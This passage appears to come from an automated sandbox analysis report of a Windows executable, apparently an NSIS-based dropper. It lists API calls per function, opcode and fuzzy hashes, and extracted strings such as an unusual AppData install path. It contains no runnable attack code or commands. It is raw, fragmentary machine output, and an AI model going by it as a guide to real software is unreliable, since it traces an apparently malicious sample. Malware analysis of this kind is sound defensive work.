                                                                                            • Instruction ID: 68c61e8d1810f1ea9cab55705828a401d3ebcdae1eadef42580152fd7570d6fd
                                                                                            • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                            • Instruction Fuzzy Hash: 4BD0123204020EBBDF11AE909D01FAB3B1DEB08350F014826FE06A80A2D776D530AB54
                                                                                            APIs
                                                                                            • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: AttributesFile
                                                                                            • String ID:
                                                                                            • API String ID: 3188754299-0
                                                                                            • Opcode ID: f851741033878782bd382afd736986932f0f82490c74007ecaa1b2c921d2c013
                                                                                            • Instruction ID: c073ba0ee5163cb04706f99935c2f3c73a5a9b1a05bee32f9da8622fc5c815d0
                                                                                            • Opcode Fuzzy Hash: f851741033878782bd382afd736986932f0f82490c74007ecaa1b2c921d2c013
                                                                                            • Instruction Fuzzy Hash: 68D01272B04100D7DB50DBE4AF4899D73A4AB84369B348577E102F11D0DAB9D9515B29
                                                                                            APIs
                                                                                            • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040426C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend
                                                                                            • String ID:
                                                                                            • API String ID: 3850602802-0
                                                                                            • Opcode ID: cb0b7ebd38eb4799b8f4196fcc58e5a20f32a56ef1c2a101366cf6dcdfe2cd36
                                                                                            • Instruction ID: 075ccd8dd3a5a116662ee2c7ada5c50e1725780f7e4f2104ac300affc7ba1253
                                                                                            • Opcode Fuzzy Hash: cb0b7ebd38eb4799b8f4196fcc58e5a20f32a56ef1c2a101366cf6dcdfe2cd36
                                                                                            • Instruction Fuzzy Hash: 09C04CB1744201AADE108B609D45F0777585790740F158569B350E50E4C674E450D62D
                                                                                            APIs
                                                                                            • SendMessageW.USER32(00000028,?,00000001,0040406E), ref: 00404251
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend
                                                                                            • String ID:
                                                                                            • API String ID: 3850602802-0
                                                                                            • Opcode ID: f360a53124e97c409135d1b53ccadec94ff58fec8389da7a5f3de8c8d06ef766
                                                                                            • Instruction ID: 5dee82f2d739acac93035fb571c052082ac1606baee7bb158d490297d0aa81d3
                                                                                            • Opcode Fuzzy Hash: f360a53124e97c409135d1b53ccadec94ff58fec8389da7a5f3de8c8d06ef766
                                                                                            • Instruction Fuzzy Hash: 99B09236190A00AADE614B40DE49F457A62A7A8701F00C029B240640B0CAB200A0DB09
                                                                                            APIs
                                                                                            • SetFilePointer.KERNELBASE(?,00000000,00000000,004030A4,?,?,00000006,00000008,0000000A), ref: 00403332
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: FilePointer
                                                                                            • String ID:
                                                                                            • API String ID: 973152223-0
                                                                                            • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                            • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                                                                            • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                            • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                                                                            APIs
                                                                                            • KiUserCallbackDispatcher.NTDLL(?,00404007), ref: 0040423A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: CallbackDispatcherUser
                                                                                            • String ID:
                                                                                            • API String ID: 2492992576-0
                                                                                            • Opcode ID: efc6552eadcfffb9f020cd3683497eb6feb0237cfd1954b00ec8dcd11a4bd103
                                                                                            • Instruction ID: 2198674f4dd135e02f2a8ae7056ebba5a8e761495b22eeaea90ee2a366c7106d
                                                                                            • Opcode Fuzzy Hash: efc6552eadcfffb9f020cd3683497eb6feb0237cfd1954b00ec8dcd11a4bd103
                                                                                            • Instruction Fuzzy Hash: 0AA002754455409FDF015B50EF048057A61B7E5741B61C469A25551074C7354461EB19
                                                                                            APIs
                                                                                              • Part of subcall function 004052FF: lstrlenW.KERNEL32(halituses,00000000,?,762323A0,?,?,?,?,?,?,?,?,?,00403257,00000000,?), ref: 00405337
                                                                                              • Part of subcall function 004052FF: lstrlenW.KERNEL32(00403257,halituses,00000000,?,762323A0,?,?,?,?,?,?,?,?,?,00403257,00000000), ref: 00405347
                                                                                              • Part of subcall function 004052FF: lstrcatW.KERNEL32(halituses,00403257,00403257,halituses,00000000,?,762323A0), ref: 0040535A
                                                                                              • Part of subcall function 004052FF: SetWindowTextW.USER32(halituses,halituses), ref: 0040536C
                                                                                              • Part of subcall function 004052FF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405392
                                                                                              • Part of subcall function 004052FF: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053AC
                                                                                              • Part of subcall function 004052FF: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053BA
                                                                                              • Part of subcall function 00405880: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4F28,Error launching installer), ref: 004058A9
                                                                                              • Part of subcall function 00405880: CloseHandle.KERNEL32(?), ref: 004058B6
                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?), ref: 00401F4D
                                                                                              • Part of subcall function 00406722: WaitForSingleObject.KERNEL32(?,00000064,00000000,00000000,?,?,00401F01,?,?,?,?,?,?), ref: 00406733
                                                                                              • Part of subcall function 00406722: GetExitCodeProcess.KERNEL32(?,?), ref: 00406755
                                                                                              • Part of subcall function 004061DE: wsprintfW.USER32 ref: 004061EB
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                                            • String ID:
                                                                                            • API String ID: 2972824698-0
                                                                                            • Opcode ID: 716e4bcc1b8b9f2027449172acbc8f1de255482e8a371654dbc69d7b5ce7f032
                                                                                            • Instruction ID: 1848912924f12909307f0f16d051c5eef0c325367a6f8932b55625d14ee19b35
                                                                                            • Opcode Fuzzy Hash: 716e4bcc1b8b9f2027449172acbc8f1de255482e8a371654dbc69d7b5ce7f032
                                                                                            • Instruction Fuzzy Hash: 96F09032906021DBCB20FBA19D845DF76A4EF40358B2441BBF902B61D1CB7C4E519BAE
                                                                                            APIs
                                                                                            • GetDlgItem.USER32(?,000003F9), ref: 00404C93
                                                                                            • GetDlgItem.USER32(?,00000408), ref: 00404C9E
                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404CE8
                                                                                            • LoadBitmapW.USER32(0000006E), ref: 00404CFB
                                                                                            • SetWindowLongW.USER32(?,000000FC,00405273), ref: 00404D14
                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D28
                                                                                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D3A
                                                                                            • SendMessageW.USER32(?,00001109,00000002), ref: 00404D50
                                                                                            • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D5C
                                                                                            • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D6E
                                                                                            • DeleteObject.GDI32(00000000), ref: 00404D71
                                                                                            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D9C
                                                                                            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404DA8
                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E3E
                                                                                            • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E69
                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E7D
                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00404EAC
                                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404EBA
                                                                                            • ShowWindow.USER32(?,00000005), ref: 00404ECB
                                                                                            • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FC8
                                                                                            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040502D
                                                                                            • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405042
                                                                                            • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405066
                                                                                            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405086
                                                                                            • ImageList_Destroy.COMCTL32(00000000), ref: 0040509B
                                                                                            • GlobalFree.KERNEL32(00000000), ref: 004050AB
                                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405124
                                                                                            • SendMessageW.USER32(?,00001102,?,?), ref: 004051CD
                                                                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051DC
                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 004051FC
                                                                                            • ShowWindow.USER32(?,00000000), ref: 0040524A
                                                                                            • GetDlgItem.USER32(?,000003FE), ref: 00405255
                                                                                            • ShowWindow.USER32(00000000), ref: 0040525C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                            • String ID: $M$N
                                                                                            • API String ID: 1638840714-813528018
                                                                                            • Opcode ID: 7bba4bc50886af6ee4f9e8a9478083b1cbee84b53dc979653cd125d1348ee930
                                                                                            • Instruction ID: 9d148378a915bf423124f05431c6d1c5c5454a8af56f3bee09cc42272145c63f
                                                                                            • Opcode Fuzzy Hash: 7bba4bc50886af6ee4f9e8a9478083b1cbee84b53dc979653cd125d1348ee930
                                                                                            • Instruction Fuzzy Hash: 59026EB0900209EFEB109F54DD85AAE7BB9FB85314F10817AF610BA2E1D7799E41CF58
                                                                                            APIs
                                                                                            • GetDlgItem.USER32(?,000003FB), ref: 0040474E
                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 00404778
                                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 00404829
                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 00404834
                                                                                            • lstrcmpiW.KERNEL32(: Completed,007A1F20,00000000,?,?), ref: 00404866
                                                                                            • lstrcatW.KERNEL32(?,: Completed), ref: 00404872
                                                                                            • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404884
                                                                                              • Part of subcall function 004058E1: GetDlgItemTextW.USER32(?,?,00000400,004048BB), ref: 004058F4
                                                                                              • Part of subcall function 0040652B: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\You7ynHizy.exe",00403347,C:\Users\user\AppData\Local\Temp\,76233420,004035B6,?,00000006,00000008,0000000A), ref: 0040658E
                                                                                              • Part of subcall function 0040652B: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040659D
                                                                                              • Part of subcall function 0040652B: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\You7ynHizy.exe",00403347,C:\Users\user\AppData\Local\Temp\,76233420,004035B6,?,00000006,00000008,0000000A), ref: 004065A2
                                                                                              • Part of subcall function 0040652B: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\You7ynHizy.exe",00403347,C:\Users\user\AppData\Local\Temp\,76233420,004035B6,?,00000006,00000008,0000000A), ref: 004065B5
                                                                                            • GetDiskFreeSpaceW.KERNEL32(0079FEF0,?,?,0000040F,?,0079FEF0,0079FEF0,?,00000001,0079FEF0,?,?,000003FB,?), ref: 00404947
                                                                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404962
                                                                                              • Part of subcall function 00404ABB: lstrlenW.KERNEL32(007A1F20,007A1F20,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B5C
                                                                                              • Part of subcall function 00404ABB: wsprintfW.USER32 ref: 00404B65
                                                                                              • Part of subcall function 00404ABB: SetDlgItemTextW.USER32(?,007A1F20), ref: 00404B78
                                                                                            Similarity
                                                                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                            • String ID: : Completed$A$C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen
                                                                                            • API String ID: 2624150263-182501510
                                                                                            • Opcode ID: 52b5712f2dd952f907a64875e1ccc77d7d09b953cf269de9d4a5e95fdb35a845
                                                                                            • Instruction ID: d6689dd06746f62e3dccefeeeb603cce7d7bc9c76077680089f181f5c68842d6
                                                                                            • Opcode Fuzzy Hash: 52b5712f2dd952f907a64875e1ccc77d7d09b953cf269de9d4a5e95fdb35a845
                                                                                            • Instruction Fuzzy Hash: DFA190F1900209ABDB11AFA5CD41AAFB7B8EF85304F10843BF611B62D1D77C99418B6D
                                                                                            APIs
                                                                                            • CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402183
                                                                                            Strings
                                                                                            • C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen, xrefs: 004021C3
                                                                                            Similarity
                                                                                            • API ID: CreateInstance
                                                                                            • String ID: C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen
                                                                                            • API String ID: 542301482-1034134010
                                                                                            • Opcode ID: 47d0b6cfbb01b3f03f9c85bf81605092c369e934b5dec228f075aa53eaa66100
                                                                                            • Instruction ID: 8dfa29a236a07f1275cc6a79af1154fb3a8ffb17113c9066b1df84c51f017d98
                                                                                            • Opcode Fuzzy Hash: 47d0b6cfbb01b3f03f9c85bf81605092c369e934b5dec228f075aa53eaa66100
                                                                                            • Instruction Fuzzy Hash: 4F413A71A00208AFCF04DFE4C988A9D7BB5FF48314B24457AF915EB2E1DBB99981CB54
                                                                                            APIs
                                                                                            • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040446B
                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 0040447F
                                                                                            • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040449C
                                                                                            • GetSysColor.USER32(?), ref: 004044AD
                                                                                            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044BB
                                                                                            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044C9
                                                                                            • lstrlenW.KERNEL32(?), ref: 004044CE
                                                                                            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044DB
                                                                                            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004044F0
                                                                                            • GetDlgItem.USER32(?,0000040A), ref: 00404549
                                                                                            • SendMessageW.USER32(00000000), ref: 00404550
                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 0040457B
                                                                                            • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045BE
                                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 004045CC
                                                                                            • SetCursor.USER32(00000000), ref: 004045CF
                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 004045E8
                                                                                            • SetCursor.USER32(00000000), ref: 004045EB
                                                                                            • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040461A
                                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040462C
                                                                                            Similarity
                                                                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                            • String ID: : Completed$DC@$N
                                                                                            • API String ID: 3103080414-907034273
                                                                                            • Opcode ID: 2da216cdb10da56fdc38759a2ba284d26a9c8f7b49192765219d3b76b1da507d
                                                                                            • Instruction ID: 7c305bb631aa8564409a9791ba7e53f932479190766108f73685c8e55a50eb1d
                                                                                            • Opcode Fuzzy Hash: 2da216cdb10da56fdc38759a2ba284d26a9c8f7b49192765219d3b76b1da507d
                                                                                            • Instruction Fuzzy Hash: 3B61A0B1900209BFDF10AF60DD45AAA7B69FB85344F00843AF701B61E0D77DA951CF98
                                                                                            APIs
                                                                                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                            • DeleteObject.GDI32(?), ref: 004010ED
                                                                                            • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                            • DrawTextW.USER32(00000000,007A7A20,000000FF,00000010,00000820), ref: 00401156
                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                            • DeleteObject.GDI32(?), ref: 00401165
                                                                                            • EndPaint.USER32(?,?), ref: 0040116E
                                                                                            Similarity
                                                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                            • String ID: F
                                                                                            • API String ID: 941294808-1304234792
                                                                                            • Opcode ID: 218f2c87b148b58c94c6785b51cf5afc075c1faf60bc5df3e6f759b2377d660f
                                                                                            • Instruction ID: 0958fbfe94b1809001ec2c76305b3cf500f7264b01c73c256976ee1787a3906e
                                                                                            • Opcode Fuzzy Hash: 218f2c87b148b58c94c6785b51cf5afc075c1faf60bc5df3e6f759b2377d660f
                                                                                            • Instruction Fuzzy Hash: B1418C71800209AFCF058F95DE459AF7BB9FF45310F00842AF591AA1A0CB38D954DFA4
                                                                                            APIs
                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,0040607E,?,?), ref: 00405F1E
                                                                                            • GetShortPathNameW.KERNEL32(?,007A55C0,00000400), ref: 00405F27
                                                                                              • Part of subcall function 00405CF2: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D02
                                                                                              • Part of subcall function 00405CF2: lstrlenA.KERNEL32(00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D34
                                                                                            • GetShortPathNameW.KERNEL32(?,007A5DC0,00000400), ref: 00405F44
                                                                                            • wsprintfA.USER32 ref: 00405F62
                                                                                            • GetFileSize.KERNEL32(00000000,00000000,007A5DC0,C0000000,00000004,007A5DC0,?,?,?,?,?), ref: 00405F9D
                                                                                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405FAC
                                                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FE4
                                                                                            • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,007A51C0,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 0040603A
                                                                                            • GlobalFree.KERNEL32(00000000), ref: 0040604B
                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406052
                                                                                              • Part of subcall function 00405D8D: GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\You7ynHizy.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D91
                                                                                              • Part of subcall function 00405D8D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DB3
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                            • String ID: %ls=%ls$[Rename]
                                                                                            • API String ID: 2171350718-461813615
                                                                                            • Opcode ID: 210d5d9a443b3001b4c7cda13cc78adcf358d44dd1d7e4f25ad0eda9c69d4b7c
                                                                                            • Instruction ID: 42876e8bd8e74e9ce15c52ab3024c97c29192655820983ae090f8c600f4dcad6
                                                                                            • Opcode Fuzzy Hash: 210d5d9a443b3001b4c7cda13cc78adcf358d44dd1d7e4f25ad0eda9c69d4b7c
                                                                                            • Instruction Fuzzy Hash: 25312530240B156BD220BB218D48F6B3A9DEF86744F15003AFA42F62D1EA7DD8148ABD
                                                                                            APIs
                                                                                            • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\You7ynHizy.exe",00403347,C:\Users\user\AppData\Local\Temp\,76233420,004035B6,?,00000006,00000008,0000000A), ref: 0040658E
                                                                                            • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040659D
                                                                                            • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\You7ynHizy.exe",00403347,C:\Users\user\AppData\Local\Temp\,76233420,004035B6,?,00000006,00000008,0000000A), ref: 004065A2
                                                                                            • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\You7ynHizy.exe",00403347,C:\Users\user\AppData\Local\Temp\,76233420,004035B6,?,00000006,00000008,0000000A), ref: 004065B5
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: Char$Next$Prev
                                                                                            • String ID: "C:\Users\user\Desktop\You7ynHizy.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                            • API String ID: 589700163-718445130
                                                                                            • Opcode ID: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                                                                            • Instruction ID: 354a4add7e9ac5ce680480da4fd3ed99b8030fd96c8c1ffbe99f836226306b46
                                                                                            • Opcode Fuzzy Hash: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                                                                            • Instruction Fuzzy Hash: 4511B655800612A5DF303B14AD44A7772F8EF547A0F56443FE985733C4E77C5C9286AD
                                                                                            APIs
                                                                                            • GetWindowLongW.USER32(?,000000EB), ref: 00404292
                                                                                            • GetSysColor.USER32(00000000), ref: 004042D0
                                                                                            • SetTextColor.GDI32(?,00000000), ref: 004042DC
                                                                                            • SetBkMode.GDI32(?,?), ref: 004042E8
                                                                                            • GetSysColor.USER32(?), ref: 004042FB
                                                                                            • SetBkColor.GDI32(?,?), ref: 0040430B
                                                                                            • DeleteObject.GDI32(?), ref: 00404325
                                                                                            • CreateBrushIndirect.GDI32(?), ref: 0040432F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                            • String ID:
                                                                                            • API String ID: 2320649405-0
                                                                                            • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                            • Instruction ID: 595a5ac3551c8926a474018cd00e052a0643935c19338169816fcf7950983a94
                                                                                            • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                            • Instruction Fuzzy Hash: BD2135716007049FCB219F68DD48B5BBBF8AF81715B048A3EED96A26E0D734E944CB54
                                                                                            APIs
                                                                                            • ReadFile.KERNEL32(?,?,?,?), ref: 004026B6
                                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026F1
                                                                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402714
                                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A
                                                                                              • Part of subcall function 00405E6E: SetFilePointer.KERNEL32(?,00000000,00000000,00000001,?,00000000,?,?,0040262F,00000000,00000000,?,00000000,00000011), ref: 00405E84
                                                                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                            • String ID: 9
                                                                                            • API String ID: 163830602-2366072709
                                                                                            • Opcode ID: d48387ae3e024a72c6243637e6df33ec40d1b18911dabf8db30d8cce87806c70
                                                                                            • Instruction ID: 60624729709df044e3b9a276a2138f1bd207bb457e97f94edfd4483e5cf9eee0
                                                                                            • Opcode Fuzzy Hash: d48387ae3e024a72c6243637e6df33ec40d1b18911dabf8db30d8cce87806c70
                                                                                            • Instruction Fuzzy Hash: 61510974D10219AEDF219F95DA88AAEB779FF04304F50443BE901F72D0DBB89982CB58
                                                                                            APIs
                                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404BE4
                                                                                            • GetMessagePos.USER32 ref: 00404BEC
                                                                                            • ScreenToClient.USER32(?,?), ref: 00404C06
                                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404C18
                                                                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C3E
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: Message$Send$ClientScreen
                                                                                            • String ID: f
                                                                                            • API String ID: 41195575-1993550816
                                                                                            • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                            • Instruction ID: e2d68be7770c43893e1e2478522bb0d44a2fa382b0b36792216c84cf33d7cb12
                                                                                            • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                            • Instruction Fuzzy Hash: 6F015E71D00218BAEB00DB94DD85BFFBBBCAF95B11F10412BBA51B61D0C7B49A018BA4
                                                                                            APIs
                                                                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
                                                                                            • MulDiv.KERNEL32(000A38FA,00000064,000A42D0), ref: 00402E3C
                                                                                            • wsprintfW.USER32 ref: 00402E4C
                                                                                            • SetWindowTextW.USER32(?,?), ref: 00402E5C
                                                                                            • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E6E
                                                                                            Strings
                                                                                            • verifying installer: %d%%, xrefs: 00402E46
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
